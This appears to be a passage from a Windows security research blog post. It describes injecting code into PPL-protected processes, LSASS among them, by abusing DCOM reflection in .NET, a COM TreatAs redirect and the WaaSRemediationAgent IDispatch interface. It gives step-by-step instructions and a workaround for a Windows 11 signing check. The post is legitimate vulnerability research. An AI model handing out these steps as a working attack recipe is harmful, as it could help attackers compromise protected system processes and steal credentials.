Unfortunately this immediately rules out any of the scripting engines like JScript. If you've re-read my last blog post, the Code Integrity module explicitly blocks the common script engines from loading in a protected process. Instead, I need a class which is accessible out of process and can be loaded into a protected process. I realized one option is to load a registered .NET COM class. I've blogged about how .NET DCOM is exploitable, and shouldn't be used, but in this case we want the buggyness.
The blog post discussed exploiting serialization primitives, however there was a much simpler attack which I exploited by using the System.Type class over DCOM. With access to a Type object you could perform arbitrary reflection and call any method you liked, including loading an assembly from a byte array which would bypass the signature checking and give full control over the protected process.
Microsoft fixed this behavior, but they left a configuration value, AllowDCOMReflection, which allows you to turn it back on again. As we're not elevating privileges, and we have to be running as an administrator to change the COM class registration information, we can just enable DCOM reflection in the registry by writing the AllowDCOMReflection with the DWORD value of 1 to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework key before loading the .NET framework into the protected process.
The following steps need to be taken to achieve injection:
Enable DCOM reflection in the registry.
Add the TreatAs key to redirect StdFont to the System.Object COM class.
Create the WaaSRemediationAgent object.
Use the type library to get the StdFont class type info.
Create a StdFont object using the CreateInstance method which will really load the .NET framework and return an instance of the System.Object class.
Create an object in the loaded assembly to force code to execute.
Cleanup all registry changes.
You'll need to do these steps in a non .NET language as otherwise the serialization mechanisms will kick in and recreate the reflection objects in the calling process. I wrote my PoC in C++, but you can probably do it from things like Python if you're so inclined. I'm not going to make the PoC available but the code is very similar to the exploit I wrote for CVE-2014-0257, that'll give you an example of how to use DCOM reflection in C++. Also note that the default for .NET COM objects is to run them using the v2 framework which is no longer installed by default. Rather than mess around with getting this working with v4 I just installed v2 from the Windows components installer.
My PoC worked first-time on Windows 10, but unfortunately when I ran it on Windows 11 24H2 it failed. I could create the .NET object, but calling any method on the object failed with the error TYPE_E_CANTLOADLIBRARY. I could have stopped here, having proven my point but I wanted to know what was failing on Windows 11. Lets finish up with diving into that, to see if we could do something to get it to work on the latest version of Windows.
The Problem with Windows 11
I was able to prove that the issue was related to protected processes, if I changed the service registration to run unprotected then the PoC worked. Therefore there must be something blocking the loading of the library when specifically running in a protected process. This didn't seem to impact type libraries generally, the loading of stdole worked just fine, so it was something specific to .NET.
After inspecting the behavior of the PoC with Process Monitor it was clear the mscorlib.tlb library was being loaded to implement the stub class in the server. For some reason it failed to load, which prevented the stub from being created, which in turn caused any call to fail. At this point I had an idea of what's happening. In the previous blog post I discussed attacking the NGEN COM process by modifying the type library it used to create the interface stub to introduce a type-confusion. This allowed me to overwrite the KnownDlls handle and force an arbitrary DLL to get loaded into memory. I knew from the work of Clément Labro and others that most of the attacks around KnownDlls are now blocked, but I suspected that there was also some sort of fix for the type library type-confusion trick.
Digging into oleaut32.dll I found the offending fix, the VerifyTrust method is shown below:
This method is called during the loading of the type library. It's using the cached signing level, again something I mentioned in the previous blog post, to verify if the file has a signing level of 12, which corresponds to Windows signing level. If it doesn't have the appropriate cached signing level the code will try to use NtSetCachedSigningLevel to set it. If that fails it assumes the file can't be loaded in the protected process and returns the error, which results in the type library failing to load. Note, a similar fix blocks the abuse of the Running Object Table to reference an out-of-process type library, but that's not relevant to this discussion.
Based on the output from Get-AuthenticodeSignature the mscorlib.tlb file is signed, admittedly with a catalog signing. The signing certificate is Microsoft Windows Production PCA 2011 which is exactly the same certificate as the .NET Runtime DLL so there should be no reason it wouldn't get a Windows signing level. Let's try and set the cached signature level manually using my NtObjectManager PowerShell module to see if we get any insights:
00000030: 2E 0D 00 00 33 FA 00 00 F8 08 01 00 FF FF FF FF - ....3...........
Setting the signing level gives us the STATUS_INVALID_IMAGE_FORMAT error. Looking at the first 64 bytes of type library file shows that it's a raw type library rather than packaged in a PE file. This is fairly uncommon on Windows, even when a file has the extension TLB it's common for the type library to still be packed into a PE file as a resource. I guess we're out of luck, unless we can set a cached signing level on the file, it will be blocked from loading into the protected process and we need it to load to support the stub class to call the .NET interfaces over DCOM.
As an aside, oddly I have a VM of Windows 11 with the non-DLL form of the type library which does work to set a cached signing level. I must have changed the VM's configuration in some way to support this feature, but I've no idea what that is and I've decided not to dig further into it.
We could try and find a previous version of the type library file which is both validly signed, and is packaged in a PE file, however, I'd rather not do that. Of course there's almost certainly another COM object we could load rather than .NET which might give us arbitrary code execution but I'd set my heart on this approach. In the end the solution was simpler than I expected, for some reason the 32 bit version of the type library file (i.e. in Framework rather than Framework64) is packed in a DLL, and we can set a cached signing level on it.
Thus to exploit on Windows 11 24H2 we can swap the type library registration path from the 64 bit version to the 32 bit version and rerun the exploit. The VerifyTrust function will automatically set the cached signing level for us so we don't need to do anything to make it work. Even though it's technically a different version of the type library, it doesn't make any difference for our use case and the stub generator code doesn't care.
Conclusions
I discussed in this blog post an interesting type of bug class on Windows, although it is applicable to any similar object-orientated remoting cross process or remoting protocol. It shows how you can get a COM object trapped in a more privileged process by exploiting a feature of OLE Automation, specifically the IDispatch interface and type libraries.
While I wasn't able to demonstrate a privilege escalation, I showed how you can use the IDispatch interface exposed by the WaaSRemediationAgent class to inject code into a PPL-Windows process. While this isn't the highest possible protection level it allows access to the majority of processes running protected including LSASS. We saw that Microsoft has done some work to try and mitigate existing attacks such as type library type-confusions, but in our case this mitigation shouldn't have blocked the load as we didn't need to change the type library itself. While the attack required admin privilege, the general technique does not. You could modify the local user's registration for COM and .NET to do the attack as a normal user to inject into a PPL if you can find a suitable COM server exposing IDispatch.